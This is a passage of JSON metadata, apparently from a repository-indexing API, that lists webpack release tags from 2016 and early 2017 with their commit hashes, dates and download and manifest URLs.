2.0-rc.7","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.7/manifests"},{"name":"v2.2.0-rc.6","sha":"97966969b0c9e8425ecb1238deea979c6a18cb27","kind":"tag","published_at":"2017-01-16T02:48:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.6","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.6/manifests"},{"name":"v2.2.0-rc.5","sha":"437dce4c8684f4295b5bb68a6ea5662c2660d780","kind":"tag","published_at":"2017-01-15T16:23:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.5","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.5/manifests"},{"name":"v2.2.0-rc.4","sha":"f745f02910cb45a55ed659ebd99288e45a38e873","kind":"tag","published_at":"2017-01-11T15:42:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.4","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.4/manifests"},{"name":"v2.2.0-rc.3","sha":"92a8be23614f92bc5669bf43eb0ddf746b2477e7","kind":"tag","published_at":"2016-12-28T15:03:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.3","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.3/manifests"},{"name":"v2.2.0-rc.2","sha":"8369cc4c03767d7a76d1f7a047d11e71a550ddae","kind":"tag","published_at":"2016-12-22T10:51:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.2","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.2/manifests"},{"name":"v2.2.0-rc.1","sha":"27e604e23100274a8887a5acf0008376d2617071","kind":"tag","published_at":"2016-12-17T08:09:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.1/manifests"},{"name":"v2.2.0-rc.0","sha":"057814be1930cc4e8cee22c271823ea821ad067f","kind":"tag","published_at":"2016-12-14T21:32:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.0/manifests"},{"name":"v2.1.0-beta.28","sha":"2e2eac70ab1ba648ef663b9b93fdedd7928672c4","kind":"tag","published_at":"2016-12-13T07:58:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.28","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.28/manifests"},{"name":"v1.14.0","sha":"e666686d9029753c243db5880de44aba57151d76","kind":"tag","published_at":"2016-12-07T08:06:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.14.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.14.0/manifests"},{"name":"v2.1.0-beta.27","sha":"adaca2578cc3dcffbb2d0b639cb611a53f6da7c9","kind":"tag","published_at":"2016-11-15T19:00:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.27","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.27/manifests"},{"name":"v2.1.0-beta.26","sha":"afbdff48ef2d5b304a41e72f4df8d51d629bc96f","kind":"tag","published_at":"2016-11-14T00:07:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.26","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.26/manifests"},{"name":"v1.13.3","sha":"1a5fd7e8caeef794f67e56d9d734998209b0838c","kind":"commit","published_at":"2016-10-26T14:21:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.3/manifests"},{"name":"v2.1.0-beta.25","sha":"3029e5b1b1c486d7b3dd51e753d20bc25ceecd83","kind":"tag","published_at":"2016-09-21T18:31:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.25","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.25/manifests"},{"name":"v2.1.0-beta.24","sha":"1c4597f1380ff6e5c7bf2f70c997d7ff52773f5b","kind":"tag","published_at":"2016-09-20T19:13:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.24","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.24/manifests"},{"name":"v2.1.0-beta.23","sha":"8292d2f6597925d6d37fd78b91f0b5cd3798a362","kind":"tag","published_at":"2016-09-19T23:02:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.23","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.23/manifests"},{"name":"v2.1.0-beta.22","sha":"f5d9a0901cb6b0cca8dcdbb5cd5a2d21de03fde1","kind":"tag","published_at":"2016-09-07T10:43:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.22","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.22/manifests"},{"name":"v1.13.2","sha":"4b20545b375da82aa6418e6d498f01d543110af0","kind":"tag","published_at":"2016-08-18T08:31:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.2/manifests"},{"name":"v2.1.0-beta.21","sha":"c7cb6cb9d0d55b9f9185a8e9db02dcf97ac1c0de","kind":"tag","published_at":"2016-08-17T21:23:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.21","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.21/manifests"},{"name":"v2.1.0-beta.20","sha":"b3a3ef3d4545fd1ae5e6abd678de96d4ebfcc5de","kind":"tag","published_at":"2016-07-20T22:41:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.20","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.20/manifests"},{"name":"v2.1.0-beta.19","sha":"21a72529fa6af47185dc14f86b8d8de6dbcb6565","kind":"tag","published_at":"2016-07-17T22:49:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.19","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.19/manifests"},{"name":"v2.1.0-beta.18","sha":"d826f99e342f7c0ae223a6837d98d2f648780a09","kind":"tag","published_at":"2016-07-15T21:26:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.18","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.18/manifests"},{"name":"v2.1.0-beta.17","sha":"bc29455e92f4b760db745775a4fca5cde0d01d23","kind":"tag","published_at":"2016-07-13T12:04:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.17","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.17/manifests"},{"name":"v2.1.0-beta.16","sha":"90d537ef4ce1092f76bd02ee2a75838c67b809fc","kind":"tag","published_at":"2016-07-13T09:11:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.16","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.16/manifests"},{"name":"v2.1.0-beta.15","sha":"2829516da95a3bb2fe7dde76013f80f0f7e22dbb","kind":"tag","published_at":"2016-06-28T23:23:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.15","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.15/manifests"},{"name":"v2.1.0-beta.14","sha":"6748dca837b6402f056b6ac94ffc3c99f8a25c36","kind":"tag","published_at":"2016-06-24T00:02:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.14","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.14/manifests"},{"name":"v2.1.0-beta.13","sha":"36e4fd2348381d578c43abcbd15ef39a78b5bc07","kind":"tag","published_at":"2016-06-07T22:25:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.13","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.13/manifests"},{"name":"v2.1.0-beta.12","sha":"3580ec93f8ac7b999fc2faa4bccad31fe6ae5331","kind":"tag","published_at":"2016-06-05T21:02:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.12","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.12/manifests"},{"name":"v2.1.0-beta.11","sha":"0b1f08022681be796612542c7d0d3c736564a4ff","kind":"tag","published_at":"2016-06-05T18:52:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.11","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.11/manifests"},{"name":"v2.1.0-beta.10","sha":"2343af44bb4314bafc1ba29cd019bc4b28edbcbf","kind":"tag","published_at":"2016-06-05T18:19:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.10","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.10/manifests"},{"name":"v2.1.0-beta.9","sha":"dc3bd055027d8d1ebbb0ebdd07fb73387a0ab6d1","kind":"tag","published_at":"2016-06-04T18:19:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.9","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.9/manifests"},{"name":"v2.1.0-beta.8","sha":"abf0cefd592700a19856c3ef9b6d65f905ec73c1","kind":"tag","published_at":"2016-05-29T18:53:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.8","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.8/manifests"},{"name":"v1.13.1","sha":"01ea02a95cf8c446fd1dc9e82fae0febe9332034","kind":"tag","published_at":"2016-05-20T06:48:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.1/manifests"},{"name":"v2.1.0-beta.7","sha":"9162f9e6eea62137139f95b8aaedee335c870edd","kind":"tag","published_at":"2016-05-06T22:00:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.7","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.7/manifests"},{"name":"v2.1.0-beta.6","sha":"ca8b693c2c17bd06778476381fae23b3b21c0475","kind":"tag","published_at":"2016-04-21T23:03:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.6","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.6/manifests"},{"name":"v1.13.0","sha":"006d59500de0493c4096d5d4cecd64eb12db2b95","kind":"tag","published_at":"2016-04-15T13:18:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.0/manifests"},{"name":"v1.12.15","sha":"ee1b8c43b474b22a20bfc25daf0ee153dfb2ef9f","kind":"tag","published_at":"2016-04-10T22:47:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.15","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.15/manifests"},{"name":"v2.1.0-beta.5","sha":"54405b59b1dd9724e145d4d16726a926042d0e1d","kind":"tag","published_at":"2016-04-10T22:45:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.5","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.5/manifests"},{"name":"v2.1.0-beta.4","sha":"c5cc1d25a2a4c0fabdec49a86b3bc62a5d637729","kind":"tag","published_at":"2016-02-24T22:58:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.4","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.4/manifests"},{"name":"v2.1.0-beta.3","sha":"13f8b690f0eb9e6058c10631e01e54fb88cd7143","kind":"tag","published_at":"2016-02-22T22:06:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.3","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.3/manifests"},{"name":"v1.12.14","sha":"3ed27836b488401a7e9be2de1491a868a8b6f123","kind":"tag","published_at":"2016-02-22T22:04:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.14","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.14/manifests"},{"name":"v2.1.0-beta.2","sha":"69d0d2e4cfe9545d530c4e1bcb59ea01969a9908","kind":"tag","published_at":"2016-02-22T14:31:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.2","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.2/manifests"},{"name":"v2.1.0-beta.1","sha":"fd1e68f5826743b72590e8a97bcfb3d7f78745dd","kind":"tag","published_at":"2016-02-22T12:29:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.1/manifests"},{"name":"v2.1.0-beta.0","sha":"52822286a347bf525eeab7f035341fc25e857914","kind":"tag","published_at":"2016-02-22T08:44:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.0/manifests"},{"name":"v1.12.13","sha":"668a5f0bc68cad70c5182ebcab8b3b1a340e038d","kind":"tag","published_at":"2016